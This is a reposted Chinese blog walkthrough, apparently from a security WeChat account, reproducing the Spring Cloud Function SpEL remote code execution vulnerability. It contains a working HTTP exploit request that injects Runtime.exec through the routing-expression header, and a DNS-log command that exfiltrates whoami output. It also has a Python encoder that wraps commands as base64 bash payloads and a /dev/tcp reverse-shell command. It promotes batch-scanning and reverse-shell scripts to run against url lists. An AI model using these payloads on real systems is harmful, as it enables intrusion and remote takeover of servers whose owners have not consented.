×
即日起办理VIP送烛龙会员
详询微信客服
忽略

Spring-cloud-function-SpEL远程代码执行漏洞复现及POC

 

文章转载自chosec大佬的公众号,原文链接https://mp.weixin.qq.com/s/r1AVxTUiQeFRn74kuTaY8A

Spring-cloud-function-SpEL代码执行漏洞复现

 本文简单复现Spring Cloud Function SpEL远程代码执行,由于每个网站的路由不一样,所以说爆破网站路由path才能进行利用成功,后续再进行更新批量POC以及EXP

01—环境搭建

将spring3.2.2使用idea打包成jar包,直接使用kali启动,版本jdk11Spring-cloud-function-SpEL远程代码执行漏洞复现及POC插图启动之后直接访问Spring-cloud-function-SpEL远程代码执行漏洞复现及POC插图1成功搭建

02—漏洞复现

1.漏洞探测

POST /functionRouter HTTP/1.1
Host:192.168.123.195:8080
spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("ping g9juaf.dnslog.cn")
Content-Type: application/x-www-form-urlencoded
Content-Length: 3

rce

Spring-cloud-function-SpEL远程代码执行漏洞复现及POC插图2在dnslog上面查看回显

Spring-cloud-function-SpEL远程代码执行漏洞复现及POC插图32.命令执行

配合dnslog尝试带出命令回显

以下命令只适用于Linux

ping `whoami`.dnslog

进行bash-c加密

ping `whoami`.g9juaf.dnslog.cn
bash -c {echo,cGluZyBgd2hvYW1pYC5nOWp1YWYuZG5zbG9nLmNu}|{base64,-d}|{bash,-i}

加密代码如下:

import base64cmd =input('请输入你要加密的命令:')
cmd = cmd.encode('utf-8')
cmd = str(base64.b64encode(cmd))
cmd = cmd.strip('b')cmd = cmd.strip("'")
paload = 'bash -c {echo,' + cmd + '}|{base64,-d}|{bash,-i}'
print(paload)

再手动请求

Spring-cloud-function-SpEL远程代码执行漏洞复现及POC插图4

查看dnslog回显

Spring-cloud-function-SpEL远程代码执行漏洞复现及POC插图5发现成功带出

3.反弹shell

同样的我们将反弹shell进行bash加密

bash -i >&/dev/tcp/192.168.123.195/7777 0>&1

Spring-cloud-function-SpEL远程代码执行漏洞复现及POC插图6

反弹成功

Spring-cloud-function-SpEL远程代码执行漏洞复现及POC插图7

好久没写水文了,今天发篇水文,本来批量POC跟反弹EXP都写好了,但是下午发现一个问题,每个源码的路由都不一样,但是默认路由是functionRouter,可能在真实环境中确实存在默认路由的名称,但是触发漏洞几率又小,有的能触发漏洞但是未必出网,考虑到种种原因,还是把github上的源码给隐藏了,等明天找找路由字典,再去琢磨琢磨怎么写批量POC,感谢各位大佬观看,今天的文章就到这,欢迎三连。

以上文章转载自chosec大佬的公众号,原文链接https://mp.weixin.qq.com/s/r1AVxTUiQeFRn74kuTaY8A

以下是chosec大佬的github

 

Spring-cloud-function-SpEL-RCE

Spring-cloud-function-SpEL-RCE批量检测脚本,反弹shell脚本

一、批量检测脚本:

用法:

python Spel_RCE_POC.py url.txt

Spring-cloud-function-SpEL远程代码执行漏洞复现及POC插图8

加线程,效果师傅们自测,好用的话师傅们给个star,欢迎关注chaosec公众号

二、反弹shell:

反弹shell脚本

用法:

python Spel_RCE_Bash_EXP.py url lhost lport

Spring-cloud-function-SpEL远程代码执行漏洞复现及POC插图9

相关文件下载地址

该资源需登录后下载

去登录
温馨提示:若该资源侵犯了您的权益,请联系我们处理。
Spring-cloud-function-SpEL远程代码执行漏洞复现及POC
免费资源
立即下载